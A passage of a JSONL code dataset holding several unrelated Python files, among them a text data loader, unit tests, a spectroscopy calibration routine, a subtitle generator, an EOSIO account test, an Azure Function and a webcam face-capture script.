fmt='%.5f')\nprint('SUCCESSFULLY SAVE {} AT {} PLEASE VERIFY THEM'.format(MODEL_NAME, OOF_PATH))\n","sub_path":"models/keras_joe.py","file_name":"keras_joe.py","file_ext":"py","file_size_in_byte":10747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"414062647","text":"\"\"\"Preprocess csv-formatted text dataset.\"\"\"\nimport csv\n\nimport h5py\nimport numpy as np\n\n\nclass DatasetLoader:\n def __init__(self, sequence_max_length=1024):\n self.alphabet = (\n 'abcdefghijklmnopqrstuvwxyz0123456789-,;.!?:’\"/|_#$%ˆ&*˜‘+=<>()[]{} '\n )\n self.char_dict = {}\n self.sequence_max_length = sequence_max_length\n for i, c in enumerate(self.alphabet):\n self.char_dict[c] = i + 1\n\n def char2vec(self, text):\n data = np.zeros(self.sequence_max_length)\n text = text[:self.sequence_max_length]\n for i in range(0, len(text)):\n if i > self.sequence_max_length:\n return data\n elif text[i] in self.char_dict:\n data[i] = self.char_dict[text[i]]\n else:\n # unknown character set to be 68\n data[i] = 68\n return data\n\n @staticmethod\n def load_h5_dataset(dataset_path):\n h5f = h5py.File(dataset_path + \"train.h5\", \"r\")\n train_data = h5f[\"train_x\"][:]\n train_label = h5f[\"train_y\"][:]\n h5f.close()\n\n h5f = h5py.File(dataset_path + \"test.h5\", \"r\")\n test_data = h5f[\"test_x\"][:]\n test_label = h5f[\"test_y\"][:]\n h5f.close()\n return train_data, train_label, test_data, test_label\n\n def load_csv_file(self, filename, num_classes):\n \"\"\"Load CSV file, generate one-hot labels and process text data as Paper did.\"\"\"\n all_data = []\n labels = []\n with open(filename) as f:\n reader = csv.DictReader(f, fieldnames=[\"class\"], restkey=\"fields\")\n for row in reader:\n # One-hot\n one_hot = np.zeros(num_classes)\n one_hot[int(row[\"class\"]) - 1] = 1\n labels.append(one_hot)\n # Char2vec\n text = row[\"fields\"][-1].lower()\n all_data.append(self.char2vec(text))\n return np.array(all_data), np.array(labels)\n\n def load_dataset(self, dataset_path, dataset_type=\"text\"):\n # Read Classes Info\n with open(dataset_path + \"classes.txt\") as f:\n classes = []\n for line in f:\n classes.append(line.strip())\n num_classes = len(classes)\n\n if dataset_type == \"embeddings\":\n train_data, train_label, test_data, test_label = self.load_h5_dataset(\n dataset_path\n )\n elif dataset_type == \"text\":\n train_data, train_label = self.load_csv_file(\n dataset_path + \"train.csv\", num_classes\n )\n test_data, test_label = self.load_csv_file(\n dataset_path + \"test.csv\", num_classes\n )\n else:\n raise Exception(\"Dataset type '{}' is unknown.\".format(dataset_type))\n\n return train_data, train_label, test_data, test_label\n\n @staticmethod\n def batch_iter(data, batch_size, num_epochs, shuffle=True):\n \"\"\"Generates a batch iterator for a dataset.\"\"\"\n data = np.array(data)\n data_size = len(data)\n num_batches_per_epoch = int((len(data) - 1) / batch_size) + 1\n for epoch in range(num_epochs):\n # Shuffle the data at each epoch\n if shuffle:\n shuffle_indices = np.random.permutation(np.arange(data_size))\n shuffled_data = data[shuffle_indices]\n else:\n shuffled_data = data\n for batch_num in range(num_batches_per_epoch):\n start_index = batch_num * batch_size\n end_index = min((batch_num + 1) * batch_size, data_size)\n yield 
shuffled_data[start_index:end_index]\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"148142913","text":"from tools.status import *\nimport time\ndef f_reader(filename):\n print_status(\"reading from file \\33[94m{}\\33[00m\\n\".format(filename))\n time.sleep(3)\n try:\n with open(filename, 'r') as f:\n contents = f.read()\n print(contents)\n except:\n print_error('unable to locate file')\n ","sub_path":"tools/file_reader.py","file_name":"file_reader.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"412023744","text":"import numpy as np\nimport pytest\nfrom sybric.data import TimeSeriesVitalSigns\n\n\ndataset = TimeSeriesVitalSigns()\n\ndef test_TimeSeriesVitalSigns_inv_transforms():\n d = dataset\n X = d.X.astype(np.float128)\n y = d.y\n s = d.synthesis_df(X, y)\n assert np.isclose(d.inv_whiten(d.whiten(X)), X).all()\n assert np.isclose(d.inv_normalize(d.normalize(X)), X).all()\n assert np.isclose(d.inv_minmax(d.minmax(X)), X).all()\n assert np.isclose(d.inv_minmax_signals(d.minmax_signals(X)), X).all()\n\n columns = ['cat_vital_sign', 't', 'class']\n assert (s[columns] == d.df[columns]).all().all()\n assert np.isclose(s['value'], d.df['value']).all()\n\ndef test_TimeSeriesVitalSigns_transform_minmax():\n X = np.array([\n # patient 1 \n [[36, 90], [40, 100], [40, 100]],\n # patient 2 \n [[40, 80], [36, 90], [36, 90]],\n # patient 3 \n [[40, 80], [36, 90], [36, 90]]\n ])\n\n e = np.array([\n # patient 1 \n [[-1, 1], [1, 1], [1, 1]],\n # patient 2\n [[1, -1], [-1, -1], [-1, -1]],\n # patient 3\n [[1, -1], [-1, -1], [-1, -1]]\n ])\n\n assert (dataset.minmax(X, X) == e).all()\n assert X.shape == (3, 3, 2)\n\ndef test_TimeSeriesVitalSigns_transform_minmax_signals():\n X = np.array([\n # patient 1\n [[36, 90], [40, 100], [40, 100]],\n # patient 2\n [[40, 80], [36, 90], [36, 90]],\n # patient 2\n [[40, 80], [36, 90], [36, 90]],\n # patient 2\n [[40, 80], [36, 90], [36, 90]],\n ])\n\n # signal 1 = [36, 40, 40, 36] -> [-1, 1, 1, -1]\n # signal 2 = [90, 100, 80, 90] -> [ 0, 1, -1, 0]\n\n e = np.array([\n # patient 1\n [[-1, 0], [1, 1], [1, 1]],\n # patient 2\n [[1, -1], [-1, 0], [-1, 0]],\n # patient 2\n [[1, -1], [-1, 0], [-1, 0]],\n # patient 2\n [[1, -1], [-1, 0], [-1, 0]]\n ])\n\n assert (dataset.minmax_signals(X, X) == e).all()\n assert X.shape == (4, 3, 2)\n assert e.shape == (4, 3, 2)\n","sub_path":"tests/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"224288806","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# Copyright (c), 2016-2018, SISSA (International School for Advanced Studies).\n# All rights reserved.\n# This file is distributed under the terms of the MIT License.\n# See the file 'LICENSE' in the root directory of the present\n# distribution, or http://opensource.org/licenses/MIT.\n#\n# @author Davide Brunato \n#\n\"\"\"\nThis module runs tests concerning resources.\n\"\"\"\nimport unittest\nimport os\nimport sys\n\ntry:\n import xmlschema\nexcept ImportError:\n # Adds the package base dir path as first search path for imports\n pkg_base_dir = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n sys.path.insert(0, pkg_base_dir)\n import xmlschema\n\n\nclass 
TestResources(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.test_dir = os.path.dirname(__file__)\n cls.xs1 = xmlschema.XMLSchema(os.path.join(cls.test_dir, \"examples/vehicles/vehicles.xsd\"))\n cls.xs2 = xmlschema.XMLSchema(os.path.join(cls.test_dir, \"examples/collection/collection.xsd\"))\n cls.cars = cls.xs1.elements['vehicles'].type.content_type[0]\n cls.bikes = cls.xs1.elements['vehicles'].type.content_type[1]\n\n def test_absolute_path(self):\n url1 = \"https://example.com/xsd/other_schema.xsd\"\n self.assertTrue(xmlschema.normalize_url(url1, base_url=\"/path_my_schema/schema.xsd\") == url1)\n\n def test_fetch_resource(self):\n wrong_path = os.path.join(self.test_dir, 'examples/resources/issue017.txt')\n self.assertRaises(xmlschema.XMLSchemaURLError, xmlschema.fetch_resource, wrong_path)\n right_path = os.path.join(self.test_dir, 'examples/resources/issue 017.txt')\n self.assertTrue(xmlschema.fetch_resource(right_path).endswith('e%20017.txt'))\n\n\nif __name__ == '__main__':\n from xmlschema.tests import print_test_header\n\n print_test_header()\n unittest.main()\n","sub_path":"xmlschema/tests/test_resources.py","file_name":"test_resources.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"318139449","text":"def calibrate(objectlist,gratcode,secondord,gratcode2):\n from astropy.io import fits\n import numpy as np\n from tmath.wombat.getmswave import getmswave\n from tmath.wombat.womscipyrebin import womscipyrebin\n from tmath.pydux.obs_extinction import obs_extinction\n #extinction terms from Allen, 3rd edition\n extwave= [2400.,2600.,2800.,3000.,3200.,3400.,3600.,3800., \\\n 4000.,4500.,5000.,5500.,6000.,6500.,7000.,8000., \\\n 9000.,10000.,12000.,14000.]\n extvals=[68.0,89.0,36.0,4.5,1.30,0.84,0.68,0.55,0.46,0.31, \\\n 0.23,0.195,0.170,0.126,0.092,0.062,0.048,0.039, \\\n 0.028,0.021]\n fluxfits=fits.open('fluxstar'+gratcode+'.fits')\n fluxstar=fluxfits[0].data\n fluxhead=fluxfits[0].header\n fluxwavezero=float(fluxhead['CRVAL1'])\n fluxwavedelt=float(fluxhead['CDELT1'])\n fluxwave=np.arange(len(fluxstar))*fluxwavedelt+fluxwavezero\n fluxairmass=float(fluxhead['AIRMASS'])\n fluxname=fluxhead['OBJECT']\n try:\n fluxnum=int(fluxhead['OBSNUM'])\n except KeyError:\n fluxnum=0\n if (secondord):\n fluxfits2=fits.open('fluxstar'+gratcode2+'.fits')\n fluxstar2=fluxfits2[0].data\n fluxhead2=fluxfits2[0].header\n fluxwavezero2=float(fluxhead2['CRVAL1'])\n fluxwavedelt2=float(fluxhead2['CDELT1'])\n fluxwave2=np.arange(len(fluxstar2))*fluxwavedelt2+fluxwavezero2\n fluxairmass2=float(fluxhead2['AIRMASS'])\n fluxname2=fluxhead2['OBJECT']\n try:\n fluxnum2=int(fluxhead2['OBSNUM'])\n except KeyError:\n fluxnum2=0\n observat=fluxhead['OBSERVAT'].strip().lower()\n sitefactor=obs_extinction(observat)\n infile=open(objectlist,'r')\n for msfile in infile:\n msfile=msfile.strip()\n if ('.fits' not in msfile):\n msfile=msfile+'.fits'\n multifits=fits.open(msfile)\n multispec=multifits[0].data\n mshead=multifits[0].header\n objectname=mshead['OBJECT']\n print('The object is: {}'.format(objectname))\n airmass=float(mshead['AIRMASS'])\n exptime=float(mshead['EXPTIME'])\n if (exptime < 1):\n exptime=1.0\n num_apertures=multispec.shape[1]\n num_bands=multispec.shape[0]\n wavearr=np.zeros((multispec.shape[2],multispec.shape[1]))\n if (secondord):\n multispec2=multispec.copy()\n mshead2=mshead.copy()\n for i in range(0,num_apertures):\n print('\\nAperture {}:'.format(i+1))\n 
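# per-aperture flow (descriptive note, grounded in the code below): build the\n # wavelength axis for this aperture, rebin the extinction curve and the flux\n # standard onto it, then correct every band of the spectrum in place\n 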
wave=getmswave(mshead,i)\n extinction=womscipyrebin(extwave,extvals,wave)\n extfactor=np.exp(extinction*sitefactor*airmass)\n fluxstartmp=womscipyrebin(fluxwave,fluxstar,wave)\n wdelt=wave[1]-wave[0]\n for j in range(0,num_bands):\n multispec[j,i,:]=multispec[j,i,:]*extfactor #extinction\n multispec[j,i,:]=multispec[j,i,:]/fluxstartmp #flux\n multispec[j,i,:]=multispec[j,i,:]/exptime #adjust to time\n multispec[j,i,:]=multispec[j,i,:]*10**(-19.44) #AB->fnu\n multispec[j,i,:]=multispec[j,i,:]*2.99792458e18/wave/wave #fnu->flm\n if (secondord):\n fluxstartmp2=womscipyrebin(fluxwave2,fluxstar2,wave)\n for j in range(0,num_bands):\n multispec2[j,i,:]=multispec2[j,i,:]*extfactor #extinction\n multispec2[j,i,:]=multispec2[j,i,:]/fluxstartmp2 #flux\n multispec2[j,i,:]=multispec2[j,i,:]/exptime #adjust to time\n multispec2[j,i,:]=multispec2[j,i,:]*10**(-19.44) #AB->fnu\n multispec2[j,i,:]=multispec2[j,i,:]*2.99792458e18/wave/wave #fnu->flm\n msfile='c'+gratcode+msfile\n mshead.set('FLUX_Z',fluxairmass,'airmass of flux standard')\n mshead.set('FLUX_NUM',fluxnum,'obsnum of flux standard')\n mshead.set('FLUX_OBJ',fluxname,'id of flux standard')\n outhdu=fits.PrimaryHDU(multispec)\n hdul=fits.HDUList([outhdu])\n hdul[0].header=mshead.copy()\n hdul.writeto(msfile,overwrite=True)\n hdul.close()\n if (secondord):\n msfile2='c'+gratcode2+msfile\n mshead2.set('FLX2_Z',fluxairmass,'airmass of flux second ord. standard')\n mshead2.set('FLX2_NUM',fluxnum,'obsnum of flux second ord. standard')\n mshead2.set('FLX2_OBJ',fluxname,'id of flux second ord. standard')\n outhdu=fits.PrimaryHDU(multispec2)\n hdul=fits.HDUList([outhdu])\n hdul[0].header=mshead2.copy()\n hdul.writeto(msfile2,overwrite=True)\n hdul.close()\n\n infile.close()\n fluxfits.close()\n if (secondord):\n fluxfits2.close()\n print('calibrate')\n print(objectlist,gratcode,secondord,gratcode2)\n return\n\n","sub_path":"spectral_reduction/tmath/pydux/calibrate.py","file_name":"calibrate.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"7084997","text":"def grid_land(_list, i=0, f=0, empty_list=[], adj_m=[]):\n if i < len(_list):\n\n while f < len(_list):\n\n x_value = _list[i] - _list[f]\n y_value = _list[i + 1] - _list[f + 1]\n\n if x_value < 0:\n x_value = int(x_value / -1)\n\n if y_value < 0:\n y_value = int(y_value / -1)\n\n weight = x_value + y_value\n\n if weight == 0:\n empty_list.append(-1)\n\n else:\n empty_list.append(weight)\n f = f + 2\n\n\n adj_m.append(empty_list)\n grid_land(_list, i + 2, 0, [], adj_m)\n\n else:\n graph(adj_m)\n\n\n\ndef graph(adj_m):\n\n print(adj_m)\n ticked = [0]\n total = 0\n\n # going through the visited columns\n for column in range(0, len(adj_m) - 1):\n\n min_val = 99999\n\n\n # if the column is not ticked skip column\n\n if column not in ticked:\n continue\n\n # going through each ticked column\n row = 0\n for y in adj_m[column]:\n\n # finding min value and its row\n if row in ticked:\n row += 1\n continue\n\n if 0 < y < min_val:\n min_val = y\n del_row = row\n row += 1\n\n ticked.append(del_row)\n total = total + min_val\n\n print(total)\n\n\n\ngrid_land([3, 6, 7, 9, 4, 4, 1, 7, 8, 2])\n","sub_path":"gridland4.py","file_name":"gridland4.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"521406556","text":"import os\nimport librosa\nimport pysrt\nfrom pysrt import SubRipTime\nimport sys\nfrom pathlib import 
Path\nimport re\nfrom datetime import timedelta\nimport chardet\nfrom moviepy.editor import *\n\nimport numpy as np\n\nfrom ffmpeg import Transcode\n\nclass Media:\n \"\"\"\n The Media class represents a media file to be retrieved and analyzed\n \"\"\"\n\n # Supported media formats\n FORMATS = ['.mkv', '.mp4', '.wmv', '.avi', '.flv']\n\n # The frequency of the generated audio\n FREQ = 16000\n\n # The number of coefficients to extract from the mfcc\n N_MFCC = 13\n\n # The number of samples in each mfcc coefficient\n HOP_LEN = 512.0\n\n # The length (seconds) of each item in the mfcc analysis\n LEN_MFCC = HOP_LEN/FREQ\n\n def __init__(self, filepath, subtitles=None, WPS=5):\n prefix, ext = os.path.splitext(filepath)\n if ext == '.srt':\n return self.from_srt(filepath)\n if ext == '.txt':\n return self.from_txt(filepath)\n if not ext:\n raise ValueError(f'Unknown file: \"{filepath}\"')\n if ext not in Media.FORMATS:\n raise ValueError(f'Filetype {ext} not supported: \"{filepath}\"')\n self.__subtitles = subtitles\n self.filepath = os.path.abspath(filepath)\n self.filename = os.path.basename(prefix)\n self.extension = ext\n self.offset = timedelta()\n self.WPS = WPS # Words (spoken) per second\n \n def from_srt(self, filepath):\n prefix, ext = os.path.splitext(filepath)\n if ext != '.srt':\n raise ValueError('Filetype must be .srt')\n prefix = os.path.basename(re.sub(r'\\.\\w\\w$', '', prefix))\n dir = os.path.dirname(filepath)\n for f in os.listdir(dir):\n _, ext = os.path.splitext(f)\n if f.startswith(prefix) and ext in Media.FORMATS:\n return self.__init__(os.path.join(dir, f), subtitles=[filepath])\n raise ValueError(f'No media for subtitle: \"{filepath}\"')\n\n def from_txt(self, filepath):\n prefix, ext = os.path.splitext(filepath)\n if ext != '.txt':\n raise ValueError('Filetype must be .txt')\n prefix = os.path.basename(re.sub(r'\\.\\w\\w$', '', prefix))\n dir = os.path.dirname(filepath)\n for f in os.listdir(dir):\n _, ext = os.path.splitext(f)\n if prefix in f and ext in Media.FORMATS:\n return self.__init__(os.path.join(dir, f), subtitles=[filepath])\n raise ValueError(f'No media for subtitle: \"{filepath}\"')\n \n def subtitles(self):\n if self.__subtitles is not None:\n for s in self.__subtitles:\n yield(Text(self, s))\n else:\n dir = os.path.dirname(self.filepath)\n for f in os.listdir(dir):\n if '.txt' in f and self.filename in f:\n yield(Text(self, os.path.join(dir, f)))\n\n def mfcc(self, duration=60*15, seek=True):\n transcode = Transcode(self.filepath, duration=duration, seek=seek)\n self.offset = transcode.start\n print('Transcoding...')\n transcode.run()\n y, sr = librosa.load(transcode.output, sr=Media.FREQ)\n self.mfcc = librosa.feature.mfcc(y=y, sr=sr, hop_length=int(Media.HOP_LEN), n_mfcc=int(Media.N_MFCC))\n clip = AudioFileClip(transcode.output)\n self.dur = clip.duration\n os.remove(transcode.output)\n return self.mfcc\n\nclass Subtitle:\n \"\"\"\n Subtitle class represents a .srt file on the disk and provides the functionality to inspect and manipulate the contents\n \"\"\"\n\n def __init__(self, media, path):\n self.media = media\n self.path = path\n self.subs = pysrt.open(self.path)\n\n def srt_to_transcript(self):\n filename, _ = os.path.splitext(self.path)\n subs = pysrt.open(self.path)\n with open(f'{filename}.txt', 'w+') as f:\n for sub in subs:\n f.write(f'{sub.text}\\n')\n\n\nclass Text:\n \"\"\"\n Text class reads .txt file and converts it to .srt\n \"\"\"\n\n def __init__(self, media, path):\n self.media = media\n self.path = path\n self.lines = 
open(self.path)\n \n def determine_speech(self, model):\n print('determine')\n mfcc = self.media.mfcc.T\n mfcc = mfcc[..., np.newaxis]\n y_pred = model.predict(mfcc)\n y_pred = y_pred.reshape(-1,)\n num_chunks = round(len(y_pred)/self.media.dur)\n chunks = [ y_pred[i:i+num_chunks] for i in range(0, len(y_pred), num_chunks) ]\n self.__secs = [ round(sum(i)/len(i)) for i in chunks ]\n return self.__secs\n\n def to_srt(self):\n print('before')\n with open(self.path) as f:\n text = f.read()\n text = text.replace('\\n\\n', '\\n').split('\\n')\n\n with open(f'static/{self.media.filename}.srt', 'w+') as f: # creating a new srt file\n print(f'{self.media.filename}.srt')\n print('Creating srt...')\n num = 1\n times = []\n\n for i, value in enumerate(self.__secs, start=0):\n if i > 1 and i < len(text):\n num_words = len(text[i-1].split(' '))\n if num_words > self.media.WPS:\n continue\n if value == 1:\n sec = i\n times.append(sec)\n\n for i, time in enumerate(times):\n num_words = len(text[i].split(' '))\n if num_words > self.media.WPS:\n add = 2\n else:\n add = 1\n if not text[i+1]:\n print(i, text[i])\n break\n if time > 3600:\n hours = time // 3600\n else:\n hours = 0\n mins = (time - hours*3600) // 60\n secs = (time - hours*3600) % 60\n print(f'{num}\\n{hours:02}:{mins:02}:{secs:02},000 --> {hours:02}:{mins:02}:{secs+add:02},000\\n{text[i]}\\n\\n')\n f.write(f'{num}\\n{hours:02}:{mins:02}:{secs:02},000 --> {hours:02}:{mins:02}:{secs+add:02},000\\n{text[i]}\\n\\n')\n num += 1\n \n self.media.srt = f'static/{self.media.filename}.srt'\n return self.media.srt\n\n def to_vtt(self):\n print('before')\n with open(self.path) as f:\n text = f.read()\n text = text.replace('\\n\\n', '\\n').split('\\n')\n\n with open(f'static/{self.media.filename}.vtt', 'w+') as f: # creating a new vtt file\n f.write('WEBVTT\\nKind: subtitles\\nLanguage: en')\n print(f'{self.media.filename}.vtt')\n print('Creating vtt...')\n num = 1\n times = []\n\n for i, value in enumerate(self.__secs, start=0):\n if i > 1 and i < len(text):\n num_words = len(text[i-1].split(' '))\n if num_words > self.media.WPS:\n continue\n if value == 1:\n sec = i\n times.append(sec)\n\n for i, time in enumerate(times):\n num_words = len(text[i].split(' '))\n if num_words > self.media.WPS:\n add = 2\n else:\n add = 1\n if not text[i+1]:\n print(i, text[i])\n break\n if time > 3600:\n hours = time // 3600\n else:\n hours = 0\n mins = (time - hours*3600) // 60\n secs = (time - hours*3600) % 60\n print(f'{num}\\n{hours:02}:{mins:02}:{secs:02}.000 --> {hours:02}:{mins:02}:{secs+add:02}.000\\n{text[i]}\\n\\n')\n f.write(f'{num}\\n{hours:02}:{mins:02}:{secs:02}.000 --> {hours:02}:{mins:02}:{secs+add:02}.000\\n{text[i]}\\n\\n')\n num += 1\n \n self.media.vtt = f'static/{self.media.filename}.vtt'\n return self.media.vtt\n\n\n# Convert timestamp to seconds\ndef timeToSec(t):\n total_sec = float(t.milliseconds)/1000\n total_sec += t.seconds\n total_sec += t.minutes*60\n total_sec += t.hours*60*60\n return total_sec\n\n# Return timestamp from cell position\ndef timeToPos(t, freq=Media.FREQ, hop_len=Media.HOP_LEN):\n return round(timeToSec(t)/(hop_len/freq))\n\n\ndef secondsToBlocks(s, hop_len=Media.HOP_LEN, freq=Media.FREQ):\n return int(float(s)/(hop_len/freq))\n\n\ndef blocksToSeconds(h, freq=Media.FREQ, hop_len=Media.HOP_LEN):\n return float(h)*(hop_len/freq)\n","sub_path":"media.py","file_name":"media.py","file_ext":"py","file_size_in_byte":7816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
+{"seq_id":"293709864","text":"import setup\nimport teos\nimport cleos\nimport eosf\nimport unittest\nfrom termcolor import colored, cprint\nimport time\n\nsetup.set_json(False) \nsetup.set_verbose(True)\nsetup.use_keosd(False)\n\ncprint(\"\"\"\nTesting `eosf.account()`.\n\n`eosf.account()` is a factory: depending on parameters, it returns the same \nobject, representing an EOSIO account functionality, yet build in many ways:\n\n -- with the `cleos create account` command;\n -- with the `cleos system newaccount` command;\n -- it can be one restored from the blockchain.\n\"\"\", 'magenta')\n\n\ndef test():\n global account_alice\n global account_carol\n global account_master\n global account_bill\n global account_test\n\n cprint(\"\"\"\nStart session: reset the local EOSIO node, create a wallet object, put the\nmaster account into it.\n \"\"\", 'magenta')\n\n reset = eosf.reset()\n account_master = eosf.AccountMaster()\n wallet = eosf.Wallet()\n wallet.import_key(account_master)\n return\n cprint(\"\"\"\nCreate an account object, named `account_alice`, with the `eosf.account()`, \nwith default parameters: \n\n -- using the `account_master` as the creator;\n -- using a random 12 character long name;\n -- using internally created `owner` and `active` keys.\n \"\"\", 'magenta')\n\n account_alice = eosf.account()\n wallet.import_key(account_alice)\n\n account_carol = eosf.account()\n wallet.import_key(account_carol)\n\n cprint(\"\"\"\nThe following `account_bill` object represents the account of the name `bill`\n \"\"\", 'magenta')\n\n account_bill = eosf.account(name=\"bill\")\n wallet.import_key(account_bill)\n\n account_test = eosf.account()\n wallet.import_key(account_test)\n\n cprint(\"\"\"\nThe last account `account_test` is going to take a contract. Now, it does not have\nany:\n \"\"\", 'magenta')\n\n account_test.code()\n\n cprint(\"\"\"\nDefine a contract, with its code specified in the EOS repository \n(build/contracts/eosio.token), and deploy it:\n \"\"\", 'magenta')\n\n contract_test = eosf.Contract(account_test, \"eosio.token\")\n deploy = contract_test.deploy()\n account_test.code()\n\n time.sleep(1)\n\n action = account_test.push_action(\n \"create\", \n '{\"issuer\":\"' \n + str(account_master) \n + '\", \"maximum_supply\":\"1000000000.0000 EOS\", \\\n \"can_freeze\":0, \"can_recall\":0, \"can_whitelist\":0}')\n\n action = contract_test.push_action(\n \"issue\", \n '{\"to\":\"' + str(account_alice)\n + '\", \"quantity\":\"100.0000 EOS\", \"memo\":\"memo\"}', \\\n account_master)\n \n cprint(\"\"\"\nExperiments with the `eosio.token` contract are shown elsewere. \nHere, we show how the session accounts recover after restarting \nthe session.\n \"\"\", 'magenta')\n\n account_alice = None\n account_bill = None\n account_carol = None\n account_test = None\n contract_test = None\n wallet = None\n\n wallet = eosf.Wallet()\n\n cprint(\"\"\"\nThe old wallet is restored. It is possible, because there is a password map \nin the wallet directory. 
\n\nNote that this provision is available only if the `keosd` Wallet Manager is not \nused and wallets are managed by the local node - this condition is set with the\n`setup.use_keosd(False)` statement above.\n \"\"\", 'magenta')\n\n wallet.restore_accounts(globals())\n print(account_alice.info())\n\n cprint(\"\"\"\nContinue operations on the restored account objects:\n \"\"\", 'magenta')\n\n action = account_test.push_action(\n \"transfer\", \n '{\"from\":\"' \n + str(account_alice)\n + '\", \"to\":\"' + str(account_carol)\n + '\", \"quantity\":\"25.0000 EOS\", \"memo\":\"memo\"}', \n account_alice)\n\n cprint(\"\"\"\nNote that the accounts have to be declared global, in order to be \nrestorable with the current means.\n \"\"\", 'magenta')\n\n\nif __name__ == \"__main__\":\n test()","sub_path":"pyteos/tests/test_account.py","file_name":"test_account.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"395542671","text":"import json\nimport logging\nimport string\n\nimport azure.functions as func\n\ndef main(req: func.HttpRequest) -> func.HttpResponse:\n logging.info(f'Start Count word Function')\n result = {\n 'values':[]\n }\n try:\n logging.info('trying to get request body')\n record_list = req.get_json().get('values')\n for record in record_list:\n res_record ={\n 'recordId': record['recordId'],\n 'data':{\n 'digit_count':None\n },\n 'errors': None, \n 'warnings': None\n }\n try:\n text = record['data']['text']\n if text is not None:\n text = ''.join([w for w in text if not w in string.punctuation])\n counter = 0\n for w in text.split():\n if w.isdigit():\n counter += 1\n # add count to a record\n res_record['data']['digit_count'] = counter\n else:\n res_record[\"warnings\"] = [ { \"message\": \"This record doesn't have content\"} ]\n\n except Exception as e:\n logging.exception(\"failed when counting digit\")\n res_record[\"errors\"] = [ { \"message\": f\"{e}\"} ]\n \n result['values'].append(res_record)\n return func.HttpResponse(\n json.dumps(result,indent=4),\n mimetype=\"application/json\",\n status_code=200\n )\n\n except Exception as e:\n logging.exception(\"failed to get body from request\")\n return func.HttpResponse(\n \"Content is invalid format\",\n status_code=400\n )\n","sub_path":"digitcount/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"225325247","text":"num_dict = {}\nfor i in range(100, 3001):\n start_item = i\n i = list(bin(i).replace(\"0b\", \"\"))\n for j in range(len(i) - 1):\n if i[j] == \"1\":\n i[j] = \"0\"\n break\n i = \"\".join(i)\n diff = start_item - int(i, 2)\n if not num_dict.get(diff):\n num_dict[diff] = True\n\nprint(len(num_dict))\n","sub_path":"5_task/5_17370/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"232627352","text":"# Commands --------------------------------------------------------------------------------\n\n# python roi_capture.py\n\n# Import libraries ------------------------------------------------------------------------\n\nimport numpy as np\nimport cv2\nimport os\nimport time\n\n# Initialization --------------------------------------------------------------------------\n\n# Get data file name\nuser_name = input(\"Enter name: \")\nos.mkdir(\"./capture_output/\" + 
user_name)\n\n\n# loads caffe face detector\nprint(\"[INFO] loading face detector...\")\nnet = cv2.dnn.readNetFromCaffe(\"face_detector/deploy.prototxt\",\n \"face_detector/res10_300x300_ssd_iter_140000.caffemodel\")\n\n# Initialize video feed with warm up period\nprint(\"[INFO] starting video stream...\")\nvs = cv2.VideoCapture(0)\ntime.sleep(2.0)\n\n# Camera ----------------------------------------------------------------------------------\n\nimg_num = 0\nwhile True:\n # Capture and resize video feed\n ret, frame = vs.read()\n\n # Convert frame to blob type\n h = frame.shape[0]\n w = frame.shape[1]\n blob = cv2.dnn.blobFromImage(cv2.resize(frame, (300, 300)), 1.0,\n (300, 300), (104.0, 177.0, 123.0))\n\n # Have the NN analyze the blob\n net.setInput(blob)\n detections = net.forward()\n\n # Kill all windows on ESC keypress\n key = cv2.waitKey(20)\n\n box = []\n for i in range(0, 1):\n # Determine prediction confidence\n confidence = detections[0, 0, i, 2]\n\n # Filter poor detections\n if confidence > .7:\n # Compute ROI coordinates\n box = detections[0, 0, i, 3:7] * np.array([w, h, w, h])\n (startX, startY, endX, endY) = box.astype(\"int\")\n\n # Make sure ROI is in frame\n startX = max(0, startX)\n startY = max(0, startY)\n endX = min(w, endX)\n endY = min(h, endY)\n\n # Pre-process the ROI data\n face = frame[startY:endY, startX:endX]\n\n # Draw box and confidence label\n cv2.rectangle(frame, (startX, startY), (endX, endY),\n (0, 0, 255), 2)\n\n # Wait for user to press SPACE\n if key == 32:\n img_name = \"{name}_{num}.png\".format(num=img_num, name=user_name)\n img_path = \"./capture_output/\" + user_name + \"/\" + img_name\n cv2.imwrite(img_path, face)\n print(\"[INFO] \" + img_name + \" saved in ./capture_output/\" + user_name)\n img_num += 1\n\n # Show the drawn frame, DFT amd ROI\n cv2.imshow(\"Camera\", frame)\n\n # Exit on ESC\n if key == 27:\n print(\"[INFO] Closing capture...\")\n break\ncv2.destroyAllWindows()\nvs.release()\n","sub_path":"roi_capture.py","file_name":"roi_capture.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"442186707","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\nimport os\r\nos.chdir(os.path.dirname(os.path.realpath(__file__)))\r\nfrom math import factorial \r\nfrom matplotlib.ticker import AutoLocator\r\nfrom AtomFieldInt_V3 import atom, dipole\r\n\r\n# global constants:\r\nc = 2.99792458e8 # speed 